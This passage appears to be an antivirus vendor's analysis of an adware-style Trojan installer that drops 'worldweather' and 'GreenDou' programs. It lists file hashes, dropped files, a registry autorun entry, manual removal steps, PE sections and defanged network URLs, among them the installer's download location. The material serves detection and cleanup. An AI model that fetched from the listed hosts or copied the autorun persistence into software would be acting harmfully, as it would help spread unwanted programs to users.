| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\System.dll |
| 9b54944ce476591d65288b0701a52c46 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\nsRandom.dll |
| 0a4fa7a9ba969a805eb0603c7cfe3378 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\processwork.dll |
| 76d2faad042161f24b6c9c78de3bd265 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\xID.dll |
| 0600be4459db030785c2d61ab8ea4de0 | c:\Program Files\greeou\GreenDou.exe |
| 1ec57595ea72f47d328acb5fa13aa6f9 | c:\Program Files\worldweather\5.0.0.5002\AQI.5002.exe |
| af9dc00391e568586f6e045c0d80ec58 | c:\Program Files\worldweather\5.0.0.5002\PM10.5002.exe |
| 3ae2ae19da4de10a41f631e0cd59464d | c:\Program Files\worldweather\5.0.0.5002\PM25.5002.exe |
| f41b53208000678976ec71d4574dcfa3 | c:\Program Files\worldweather\5.0.0.5002\mfc5002.dll |
| f22066ce95253bc57a054623a65eda06 | c:\Program Files\worldweather\5.0.0.5002\sqlite3.dll |
| b81124b08acb34b432fae845335bce99 | c:\Program Files\worldweather\5.0.0.5002\sqliteApi.dll |
| 2a4c40c30da6bbccf03928dcb998193c | c:\Program Files\worldweather\5.0.0.5002\uninst.exe |
| f9e2d87db3700c704d8e7fffa0ab8985 | c:\Program Files\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe |
| f44c74c844114fa977315265813afb26 | c:\Program Files\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe |
| 7eab31806313acd8429450e72c294442 | c:\Program Files\worldweather\5.0.0.5002\worldweather.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
worldweather.exe:2452
worldWeatherUpdate.5002.exe:2896
365weatherIns_61.exe:408
greendou.exe:772
worldWeatherRealTime5002.exe:2408 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (288 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (216 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Program Files%\worldweather\5.0.0.5002\weatherData.tmp (354 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@uujzy[1].txt (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\369[1].ico (16369 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM10Context\PM10Context.db.!mv (835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\PM10Context[1].xml (835 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\AQIContext\AQIContext.db.!mv (365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\WeatherContext[1].xml (509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\PM25Context[1].xml (624 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sina.com[1].txt (196 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\366.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\AQIContext[1].xml (365 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM25Context\PM25Context.db.!mv (624 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db.!mv (509 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\369.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\366[1].ico (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\System.dll (11 bytes)
%Program Files%\worldweather\5.0.0.5002\PM10.5002.exe (7192 bytes)
%Program Files%\worldweather\5.0.0.5002\weather.db (6584 bytes)
%Program Files%\worldweather\5.0.0.5002\uninst.exe (2251 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\un_update.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\ToggleImages.html (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_move.jpg (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_large.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_next.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_max.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (80589 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\n99.png (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\tips.ico (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\loading1.bmp (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\tongji_61[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\KillProcDLL.dll (4 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\err.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\checkbox1.bmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\tongji.html (2 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_min.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\inetc.dll (784 bytes)
%Program Files%\worldweather\5.0.0.5002\areacode.db (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\2.jpg (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_close.bmp (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\min.png (440 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\bg.bmp (18424 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\i.gif (170 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\loading.gif (8 bytes)
%Program Files%\worldweather\5.0.0.5002\sqliteApi.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\3.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe (4992 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_small.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsWindows.dll (10 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\update.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\´óÖÚÌìÆøÃâ€Â¤±¨Ã¶Ãâ€ÂØ.lnk (911 bytes)
%Program Files%\worldweather\5.0.0.5002\worldweather.exe (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\md5dll.dll (8 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\updateRecord.db (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\loading.png (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\´óÖÚÌìÆøÃâ€Â¤±¨.lnk (943 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\checkbox2.bmp (2 bytes)
%Program Files%\worldweather\5.0.0.5002\AQI.5002.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\loading2.bmp (696 bytes)
%Program Files%\worldweather\5.0.0.5002\WeatherContext\WeatherContext.db (352 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe (11344 bytes)
%Program Files%\worldweather\5.0.0.5002\sqlite3.dll (20416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\1.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\large\n99.png (784 bytes)
%Program Files%\worldweather\5.0.0.5002\PM25.5002.exe (11344 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_setting.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_complete.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\kz.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\close.png (873 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\skin.xml (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_close.jpg (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\topbar.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\mfc5002.dll (5520 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\updateContext\updateRecord.db (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[2].js (7666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\skin_[1].css (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[2] (10367 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\guide_tip[1].png (1459 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX6.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\lk_jumei[1].png (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\titlebg[1].png (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[1].js (6192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[2].js (1187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\foot_slider[1].jpg (322 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[1].js (17536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140512170407_319[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[2].js (1208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20130820165531_481[1].gif (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\selogo_111207[1].png (1848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[2].js (2605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\skin2_0[1].gif (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140508103513_537[1].gif (6813 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140512170546_833[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[2].txt (1879 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\skin3[1].gif (1314 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[1].txt (1398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\fine_cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[1].js (7992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[2].js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\v53_2icos[1].gif (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\favicon[1].ico (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (774 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[1].htm (7472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\setskinbg[1].gif (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\fbg_about[1].png (805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\v53_arrow_h[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[2].js (4349 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\img-video-2[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[1].js (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\get_tj[1].php (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140513112717_7[1].jpg (3852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\guide_tip[1].png (2319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\skin_tips_n1[1].gif (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wan.sogou[1].txt (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\setting_icon[1].gif (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\rec[1].do (374 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\get_123_v53[1].php (16030 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\subnav_v41[1].png (682 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140512112800_851[1].jpg (2380 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (2306 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\20130531144119_126[1].png (3810 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v53_bicos[1].gif (826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[1].js (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[2].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\logo_1112293[1].gif (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\search_arrow[1].gif (447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\i-ico-2b[1].png (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\icon4[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[2].js (19464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140507144656_823[1].jpg (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\fIXLig2wT89333[1].jpg (2500 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\selogo_111207[2].png (1606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\selogo_111207[1].png (2008 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[1].js (4851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\img-news[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\new-ico[1].png (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\1oq9Gg9Y3L8813[1].jpg (1492 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140507144124_693[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\new-erweima2[1].png (2985 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\processwork.dll (6140 bytes)
%Program Files%\greeou\skin\Default\control\tab_hover.png (346 bytes)
%Program Files%\greeou\skin\Default\control\tab_bg.png (314 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Program Files%\greeou\skin\Default\misc\16_ad_hunter.png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\365weatherIns_61.exe (119257 bytes)
%Program Files%\greeou\profile\Template\start\style.css (3 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar.png (321 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites2.png (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Program Files%\greeou\skin\Default\control\MenuItem_Hover.png (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go.png (650 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_bg.png (507 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites.png (700 bytes)
%Program Files%\greeou\profile\Defaults\CommandBars.ini (1 bytes)
%Program Files%\greeou\skin\Default\mskin.ini (10 bytes)
%Program Files%\greeou\GreenDou.exe (25123 bytes)
%Program Files%\greeou\skin\Default\control\status_bar_bg.png (445 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown_hover.png (774 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward.png (947 bytes)
%Program Files%\greeou\skin\Default\control\win_minimize.png (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh.png (1 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown.png (794 bytes)
%Program Files%\greeou\profile\Template\start\images\logo.gif (3 bytes)
%Program Files%\greeou\skin\Default\control\Button_Pressed.png (1 bytes)
%Program Files%\greeou\profile\Template\start\index.html (832 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_website_info.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new.png (879 bytes)
%Program Files%\greeou\skin\Default\control\title_bg.png (655 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_logo.gif (2 bytes)
%Program Files%\greeou\skin\Default\shared\16_edit.png (646 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back3.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop2.png (1 bytes)
%Program Files%\greeou\profile\SearchEngine\config.ini (226 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new2.png (801 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom2.png (724 bytes)
%Program Files%\greeou\profile\Template\start\images\dian.gif (376 bytes)
%Program Files%\greeou\skin\Default\control\win_close.png (362 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_bg.gif (83 bytes)
%Program Files%\greeou\skin\Default\control\tab_active.png (1 bytes)
%Program Files%\greeou\skin\Default\control\mainframe.png (288 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back2.png (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_inactive.png (281 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_inactive.png (259 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_open.png (614 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search.png (871 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown.png (794 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (354562 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search2.png (969 bytes)
%Program Files%\greeou\skin\Default\control\win_maximum.png (275 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new.png (637 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom.png (733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Inetc.dll (20 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar_hover.png (322 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_active.png (957 bytes)
%Program Files%\greeou\skin\Default\control\progress.png (708 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back.png (953 bytes)
%Program Files%\greeou\skin\Default\control\combo.png (260 bytes)
%Program Files%\greeou\profile\SearchEngine\google.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_new.png (350 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown_hover.png (774 bytes)
%Program Files%\greeou\profile\Template\start\left.html (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward2.png (1 bytes)
%Program Files%\greeou\skin\Default\control\skin_selector.png (283 bytes)
%Program Files%\greeou\skin\Default\control\win_restore.png (302 bytes)
%Program Files%\greeou\skin\Default\control\Button_Checked.png (976 bytes)
%Program Files%\greeou\skin\Default\misc\16_page.png (519 bytes)
%Program Files%\greeou\skin\Default\control\tab_close.png (259 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history2.png (994 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo2.png (840 bytes)
%Program Files%\greeou\skin\Default\control\tab_new_hover.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (3 bytes)
%Program Files%\greeou\profile\SearchEngine\taobao.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\Button_Hover.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new2.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_closed.png (587 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop.png (1 bytes)
%Program Files%\greeou\skin\Default\shared\16_new.png (650 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Â̶¹ä¯ÀÀÆ÷\Â̶¹ä¯ÀÀÆ÷.lnk (678 bytes)
%Documents and Settings%\%current user%\Desktop\Â̶¹ä¯ÀÀÆ÷.lnk (666 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history.png (847 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo.png (748 bytes)
%Program Files%\greeou\profile\SearchEngine\baidu.ico (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go2.png (648 bytes)
%Program Files%\greeou\skin\Default\control\combo_hover.png (261 bytes)
%Program Files%\greeou\skin\Default\control\tab_close_hover.png (2 bytes)
%Program Files%\greeou\profile\Defaults\searchkeys.ini (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward3.png (1 bytes)
%Program Files%\greeou\ico\taobao.ico (2104 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_new.png (548 bytes)
%Program Files%\greeou\profile\Template\start\images\logo2.gif (596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\nsRandom.dll (935 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"worldweather5002" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe /autorun" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: MeinV
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: Corporation. All rights reserved.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: Installer Application
Comments: http://hh8.xjtj.org
Language: Language Neutral
Company Name: MeinVProduct Name: ?????Product Version: 1.0.0.0Legal Copyright: Corporation. All rights reserved.Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: Installer ApplicationComments: http://hh8.xjtj.orgLanguage: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 81920 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 274432 | 226616 | 226816 | 4.99531 | e4507cfd24e349a1798e0ce96876409d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://lm.beilequ.com/update/365/365weatherIns_61.rar | 122.225.100.200 |
| hxxp://lvdou.300duo.com/favicon.ico | 223.255.145.200 |
| hxxp://lvdou.300duo.com/ | 223.255.145.200 |
| hxxp://proxy.sogou.com/?22014 | |
| hxxp://njsh.cdn.sogou.com/kan/static/css/DD_belatedPNG_0.0.8a-min.js?t= | |
| hxxp://proxy.sogou.com/css/skin_.css?V=cr | |
| hxxp://njsh.cdn.sogou.com/imgn/v32/icon4.gif | |
| hxxp://njsh.cdn.sogou.com/imgn/v32/selogo_111207.png | |
| hxxp://njsh.cdn.sogou.com/v53/imgn/v53_2icos.gif | |
| hxxp://proxy.sogou.com/v53/jsn/v53_123n.js?V=cr | |
| hxxp://njsh.cdn.sogou.com/imgn/v32/skin3.gif | |
| hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/subnav_v41.png | |
| hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140508103513_537.gif | |
| hxxp://njsh.cdn.sogou.com/imgn/v32/skin2_0.gif | |
| hxxp://njsh.cdn.sogou.com/v53/imgn/v53_bicos.gif | |
| hxxp://njsh.cdn.sogou.com/v53/imgn/v53_arrow_h.gif | |
| hxxp://njsh.cdn.sogou.com/imgu/2013/05/20130531144119_126.png | |
| hxxp://njsh.cdn.sogou.com/imgn/123ie/search_arrow.gif | |
| hxxp://njsh.cdn.sogou.com/imgn/123ie/setting_icon.gif | |
| hxxp://njsh.cdn.sogou.com/imgu/2013/08/20130820165531_481.gif | |
| hxxp://njsh.cdn.sogou.com/v53/imgn/foot_slider.jpg | |
| hxxp://proxy.sogou.com/dh/dhrc/rec.do?block=gamev2&jsonp=__yx2q&t=1&_stamp=1399956568915 | |
| hxxp://njsh.cdn.sogou.com/ads_hz/_ads_2.js?t=777753 | |
| hxxp://njsh.cdn.sogou.com/imgn/v32/titlebg.png | |
| hxxp://proxy.sogou.com//v53/get_123_v53.php?block=wt&ver=v53&gfg=1&city=unknown&pid=Af22014&c=1399956570478&method=ajaf&cbf=fn | |
| hxxp://proxy.sogou.com/jsn/hotdata.js?V=1399956570493 | |
| hxxp://njsh.cdn.sogou.com/imgn/v32/fbg_about.png | |
| hxxp://njsh.cdn.sogou.com/imgn/tips/lk_jumei.png | |
| hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570071&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=62 | |
| hxxp://njsh.cdn.sogou.com/u/js/ufo2.js | |
| hxxp://njsh.cdn.sogou.com/jsn/v33_sugg_ajaj_v40_3.js | |
| hxxp://njsh.cdn.sogou.com/jsn/citydata.js | |
